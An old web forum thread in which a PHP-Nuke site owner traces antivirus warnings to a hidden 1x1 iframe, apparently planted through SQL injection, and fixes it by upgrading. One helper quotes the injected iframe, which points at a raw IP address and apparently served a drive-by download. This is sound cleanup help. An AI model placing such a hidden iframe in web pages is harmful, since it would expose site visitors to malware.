Bloodhound 109

Regular Joined: Sep 12, 2003 Posts: 63

Hi

have a phpnuke site version 6.5. When I goes into the site using IE, the sites come up, but Symantec says 'Bloodhound.Exploit.109' trojan is on your computer.

Using Mozilla Firefox I got no such messages.

I visitor using Mcafee virus scanner and IE got the message: 'JS/Downloader-AUD', script execution blocked.

Is some php scripts hacked?

regards fondy

Posted: Mon Sep 24, 2007 6:19 am

Well, here is the text from the Symantec site:

Quote:

Bloodhound.Exploit.109 is a heuristic detection for Apple QuickTime RTSP URI Remote Buffer Overflow Vulnerability. An attacker who exploits this vulnerability could perform a denial-of-service attack against a vulnerable version of QuickTime, or potentially execute arbitrary code with the privileges of the logged-on user. The exploit is triggered by opening a specially-crafted QTL file.

Applies to: Apple QuickTime Player 7.1.3

Files that are detected as Bloodhound.Exploit.109 may be malicious. We suggest that you submit to Symantec Security Response any files that are detected as Bloodhound.Exploit.109.

I would definitely look your site over and see what file is causing this and then you have to figure out how that file got on your site.

Posted: Mon Sep 24, 2007 6:21 am

Are you using any sort of encryption on your site? Maybe a theme you use?

I have seen this cause false positives when using McAfee on some sites.

Posted: Mon Sep 24, 2007 6:39 am

Hi

thanks for your answers.

Montego: Yes, will check the files and scripts. The problem with the virus startet a week ago. When I check the time stamps on the files, they are a lot older.

Jakec: No, I do not use encryption of any sort.

The link to my site: [ Only registered users can see links on this board! Get registered or login! ]

Will start looking at the files.

regards

Posted: Mon Sep 24, 2007 5:22 pm

You have a suspicious iframe in your footer

Code:

iframe src=http://81.29.241.229/usr2/andrew/index.php?id=290 width=1 height=1

My guess is that is setting off the virus checker

Posted: Tue Sep 25, 2007 12:54 am

Evader99, thanks !!

Yes, the config table and the copyright field is updated with iframe last week or so.

I dont know how anyone can update the config table. Have a secure database with id and passwords.

In any case, all is ok now, thanks !!

Regards

Posted: Tue Sep 25, 2007 12:59 am

Simple - SQL Injection. Somewhere your script has a vulnerability, given that its such an old version (6.5), I wouldn't be surprised. If you don't want your site hacked, you'll need to upgrade.

Posted: Tue Sep 25, 2007 1:40 am

Agree to upgrade, have several domains using ravennuke 2.10.01

Will start to upgrade to this version and using sentinel.

Thanks Smile

Posted: Thu Sep 27, 2007 6:28 am

Upgrading from nuke 6.5 to Ravennuke 2.10.01 with sentinel 2.5.08 finished.

No more Bloodhound and alike

Smile

Regards

Posted: Thu Sep 27, 2007 6:31 am

I would not stop there on NukeSentinel. I would get the latest upgrade pack and apply it as well. It is a CRITICAL update.

Posted: Thu Sep 27, 2007 6:33 am

Well done ! You should also update NukeSentinel and IP2Country. Smile

Posted: Thu Sep 27, 2007 7:04 am

Hi

thanks!

Have now upgraded to the latest IP2Country distribution.

Assume there will be a lot of work to upgrade to latest Sentinel, but I have to try

Smile

Regards fondy

Posted: Thu Sep 27, 2007 7:28 am

Its a simple procedure download NukeSentinel 2.5.12 from nukescripts run nsnst.php and select 2.5.08 - 2.5.09 etc. until you reach Nuke Sentinelversion 2.5.12

Posted: Thu Sep 27, 2007 7:31 am

Yes Susann, it was very simple. NowI have latest IP2Country and Sentinel 2.5.12, Great !

Thanks a lot

Regards fondy